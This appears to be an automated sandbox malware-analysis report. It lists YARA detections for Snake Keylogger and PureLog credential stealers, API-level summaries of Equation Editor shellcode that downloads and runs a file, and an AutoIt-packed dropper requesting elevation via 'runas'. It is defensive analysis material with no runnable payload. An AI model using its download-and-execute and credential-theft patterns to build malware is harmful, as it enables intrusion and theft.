Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	31.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	71.4%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035306F5 Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,00000001,?,035306ED,?,035306B3), ref: 03530702

Part of subcall function 03530715: ExitProcess.KERNEL32(00000000,?,03530709,?,035306ED,?,035306B3), ref: 0353071A

Memory Dump Source

Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecExitProcess
String ID:
API String ID: 4112423671-0
Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction ID: 614d942ad7da57d3b8e87b9eff56571fdee83f9cbc47d090757fdba00a34fe56
Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction Fuzzy Hash: F7F0285990434221CB34F268A8557F6AB50FB53B80FCC88579893870F9E16891C38E5D

Uniqueness

Uniqueness Score: -1.00%

Function 0353064B Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: d6e2d5c03bbaae5047bd860e8c45a037063d601b7c33790b3230a9dcee21499f
Instruction ID: bbb00425d1dee4590821f23ddb7e51ac03fbf6052dafc7b703798251b456dc39
Opcode Fuzzy Hash: d6e2d5c03bbaae5047bd860e8c45a037063d601b7c33790b3230a9dcee21499f
Instruction Fuzzy Hash: DD1159A148C3C12FDB22E7704C6EB56BF642B93610F19CACEA1C60F4E7E7A49001C792

Uniqueness

Uniqueness Score: -1.00%

Function 035306AA Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,0353065C,?,00000000,00000000), ref: 035306AC

Memory Dump Source

Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction ID: bf9f899a89bc0fb7068ef65f058bb84f8773a7a88eba83bdd14039529e091dfa
Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction Fuzzy Hash: 1E11AF305043023AC720E654AC44BB6F764FBD3B50F48C546E5938F0F9E2A0E443CE59

Uniqueness

Uniqueness Score: -1.00%

Function 03530631 Relevance: 1.5, APIs: 1, Instructions: 18
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 03530631

Part of subcall function 0353064B: URLDownloadToFileW.URLMON(00000000,0353065C,?,00000000,00000000), ref: 035306AC

Memory Dump Source

Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadFileLibraryLoad
String ID:
API String ID: 2776762486-0
Opcode ID: 311053999e2d96ff5b1b2860776d61a4941ced0df6fc86e7ee092ae38fd4629b
Instruction ID: 75376bb65f7b05b93bbfd7716f8617773a8f4310b346c8bce1801612d03a6c8e
Opcode Fuzzy Hash: 311053999e2d96ff5b1b2860776d61a4941ced0df6fc86e7ee092ae38fd4629b
Instruction Fuzzy Hash: 53C022C4041F4826D304B1103F331EE3F28F28321834A200194C3013B70000231B80EA

Uniqueness

Uniqueness Score: -1.00%

Function 03530715 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,?,03530709,?,035306ED,?,035306B3), ref: 0353071A

Memory Dump Source

Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
Instruction ID: 2cc832ade3305ff475a219e014bf2aeb45ca367fc0be6509f279a459a524c15b
Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
Instruction Fuzzy Hash: 46D01775201602AFD244EB24DD80F27F76EFFC4651F14D264E5194B6AAD730E892CAA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: negrett.exePID: 1500, Parent PID: 1924COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.1%
Total number of Nodes:	1161
Total number of Limit Nodes:	56

Executed Functions

Function 00B142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B1430D

Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A

GetCurrentProcess.KERNEL32(?,00BACB64,00000000,?,?), ref: 00B14422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B14429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00B14466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00B14474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00B144A0

Strings

GetNativeSystemInfo, xrefs: 00B14460
kernel32.dll, xrefs: 00B1444F
|O, xrefs: 00B536F8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 4c16fe71ac23f2e46e223447bf36fac264a4d11c0f3d94792fb42cb886c07d9d
Instruction ID: 6369642d8ab385cf677cd03f13274e2f72384d0ab2ffc9bec6e08734c30776d6
Opcode Fuzzy Hash: 4c16fe71ac23f2e46e223447bf36fac264a4d11c0f3d94792fb42cb886c07d9d
Instruction Fuzzy Hash: 34A1607690A2C0EFC712C76D78C16D97FE4AB26B41B784CD9D4819BB22DE344948CB39

Uniqueness

Uniqueness Score: -1.00%

Function 00B142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B150AA,?,?,00000000,00000000), ref: 00B142C9
LoadResource.KERNEL32(?,00000000,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20), ref: 00B535BE
SizeofResource.KERNEL32(?,00000000,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20), ref: 00B535D3
LockResource.KERNEL32(00B150AA,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20,?), ref: 00B535E6

Strings

SCRIPT, xrefs: 00B142BF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: acb7319d34e486258d5a555f20d52df5bfd0bf03c8212fc2a20e66e958fc2318
Instruction ID: 78df37bdc10f892175851b1824b9bd8c0148887432cc39f02989253c644ed393
Opcode Fuzzy Hash: acb7319d34e486258d5a555f20d52df5bfd0bf03c8212fc2a20e66e958fc2318
Instruction Fuzzy Hash: BB117C70200700BFDB218B65DC49F677BFAEBC6B51F2081A9B402D6260DB71D8448A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B52BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00B12B6B

Part of subcall function 00B13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BE1418,?,00B12E7F,?,?,?,00000000), ref: 00B13A78

Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD

GetForegroundWindow.USER32 ref: 00B52C10
ShellExecuteW.SHELL32(00000000,?,?,00BD2224), ref: 00B52C17

Strings

runas, xrefs: 00B52C0B

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 790cf6a7758457f89be1a06ffbacfd327d52f9226b8e99b6a31a198b954bd989
Instruction ID: b432d04867aa5a223fad9aff72006a019f49a2f1eb2dcd30593716193d848142
Opcode Fuzzy Hash: 790cf6a7758457f89be1a06ffbacfd327d52f9226b8e99b6a31a198b954bd989
Instruction Fuzzy Hash: 9911E7311083815AC714FF24D8929FEBBE4DF96750F9404EDF182031A2DF318AC98712

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00B55222), ref: 00B7DBCE
GetFileAttributesW.KERNEL32(?), ref: 00B7DBDD
FindFirstFileW.KERNEL32(?,?), ref: 00B7DBEE
FindClose.KERNEL32(00000000), ref: 00B7DBFA

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: f3dd802baf48b0f9edc646b737c2302916ecb6fce9808e67cdb5d89108e60c0d
Instruction ID: 520dd929acc1dba05a4145ea9be0ffbf02f92445d4c81bed116e1358d09c6f72
Opcode Fuzzy Hash: f3dd802baf48b0f9edc646b737c2302916ecb6fce9808e67cdb5d89108e60c0d
Instruction Fuzzy Hash: 93F0A030810A106782216F78AC0E8AA3BBCDE02374B108B82F83AC20E0EFB05D548695

Uniqueness

Uniqueness Score: -1.00%

Function 00B4333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00B3E505), ref: 00B4337E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00B43350, 00B4335A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 21e895dce092d4b5b893eb4d7bb27ef2a0b2812adb6191dc270535bdfa8b3cf7
Instruction ID: 2fdf46b1921328d84a1d3a32d7dbdbbedbcdd2529e36fa2ad3fb54658d862e11
Opcode Fuzzy Hash: 21e895dce092d4b5b893eb4d7bb27ef2a0b2812adb6191dc270535bdfa8b3cf7
Instruction Fuzzy Hash: ADE0E531A41218ABD710AF649C0397EBFE0DF45F50B9402D9FC059B661DE710E00A6D9

Uniqueness

Uniqueness Score: -1.00%

Function 00B309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00B309DA

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 156338d0d4de17679a556796471687ac4ce182f7c29a26945a547b45c1f38e48
Instruction ID: 5f11b6b0f14a24a4ae6ef74b93e8397ff7d956d41246ea05fd8d765126a6290a
Opcode Fuzzy Hash: 156338d0d4de17679a556796471687ac4ce182f7c29a26945a547b45c1f38e48
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B1D807
timeGetTime.WINMM ref: 00B1DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B1DB28
TranslateMessage.USER32(?), ref: 00B1DB7B
DispatchMessageW.USER32(?), ref: 00B1DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B1DB9F
Sleep.KERNEL32(0000000A), ref: 00B1DBB1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 9bcdd257ceebe3ddcc9faebe35b11424cb4731a5810a529f8ae8040ee8800cd9
Instruction ID: 56d2698c27d50ce6be769ee6371ab906f198e6c649a67e9ef4edf4deef57c187
Opcode Fuzzy Hash: 9bcdd257ceebe3ddcc9faebe35b11424cb4731a5810a529f8ae8040ee8800cd9
Instruction Fuzzy Hash: 0542E530608741DFE724CF24C885BAAB7E5FF45304F944AADE5568B291DB74E884CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B12CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00B12D07
RegisterClassExW.USER32(00000030), ref: 00B12D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B12D42
InitCommonControlsEx.COMCTL32(?), ref: 00B12D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B12D6F
LoadIconW.USER32 ref: 00B12D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B12D94

Strings

0, xrefs: 00B12CE9
TaskbarCreated, xrefs: 00B12D37
+, xrefs: 00B12CF0
AutoIt v3 GUI, xrefs: 00B12D23

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 174172a7f4a5a33e7200679adf05f40e952e4aecf563d5cfeb787399bf1afa33
Instruction ID: 744faa19af59d1fb99946835c6aa5f676e69de2b8e6de63254f93b44394e9be6
Opcode Fuzzy Hash: 174172a7f4a5a33e7200679adf05f40e952e4aecf563d5cfeb787399bf1afa33
Instruction Fuzzy Hash: 0921E3B5901258AFDB00DFA8EC89BDDBFB8FB09700F10851AF511AB2A0DBB50540CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B5065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5039A: CreateFileW.KERNEL32(00000000,00000000,?,00B50704,?,?,00000000), ref: 00B503B7

GetLastError.KERNEL32 ref: 00B5076F
__dosmaperr.LIBCMT ref: 00B50776
GetFileType.KERNEL32 ref: 00B50782
GetLastError.KERNEL32 ref: 00B5078C
__dosmaperr.LIBCMT ref: 00B50795
CloseHandle.KERNEL32(00000000), ref: 00B507B5
CloseHandle.KERNEL32(?), ref: 00B508FF
GetLastError.KERNEL32 ref: 00B50931
__dosmaperr.LIBCMT ref: 00B50938

Strings

H, xrefs: 00B508BD

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 085fd42703130b80ca0ae194dbb176bc518d0e384f8409904142a1cb3024c101
Instruction ID: c12850c8a885804bc81b52e2b84675285c3f16d79dab733ef9ea27b8855986cf
Opcode Fuzzy Hash: 085fd42703130b80ca0ae194dbb176bc518d0e384f8409904142a1cb3024c101
Instruction Fuzzy Hash: 15A10432A241458FDF19AF68D892BAE3BE0EB0A321F1401D9FC159F291DB719D16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B1344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BE1418,?,00B12E7F,?,?,?,00000000), ref: 00B13A78

Part of subcall function 00B13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13379

RegOpenKeyExW.KERNEL32 ref: 00B1356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B5318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00B531CE
RegCloseKey.ADVAPI32(?), ref: 00B53210
_wcslen.LIBCMT ref: 00B53277
_wcslen.LIBCMT ref: 00B53286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00B13560
\, xrefs: 00B5328C
Include, xrefs: 00B53184, 00B531C5
\Include\, xrefs: 00B13527

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 6e035151cee2102a695b8e424ad8dd4058e0ad5b1d684f3ec30c9f5affd6ffaa
Instruction ID: a70a81745cf3135f1df2cefbc1ede54a86e66c0b6abcaacbe5c9fbb664cf1dee
Opcode Fuzzy Hash: 6e035151cee2102a695b8e424ad8dd4058e0ad5b1d684f3ec30c9f5affd6ffaa
Instruction Fuzzy Hash: 40718E714083419EC314EF65EC829ABBBE8FF85740F8004AEF54597260EF759A88CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00B12B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00B12B8E
LoadCursorW.USER32 ref: 00B12B9D
LoadIconW.USER32 ref: 00B12BB3
LoadIconW.USER32 ref: 00B12BC5
LoadIconW.USER32 ref: 00B12BD7
LoadImageW.USER32 ref: 00B12BEF
RegisterClassExW.USER32(?), ref: 00B12C40

Part of subcall function 00B12CD4: GetSysColorBrush.USER32 ref: 00B12D07
Part of subcall function 00B12CD4: RegisterClassExW.USER32(00000030), ref: 00B12D31
Part of subcall function 00B12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B12D42
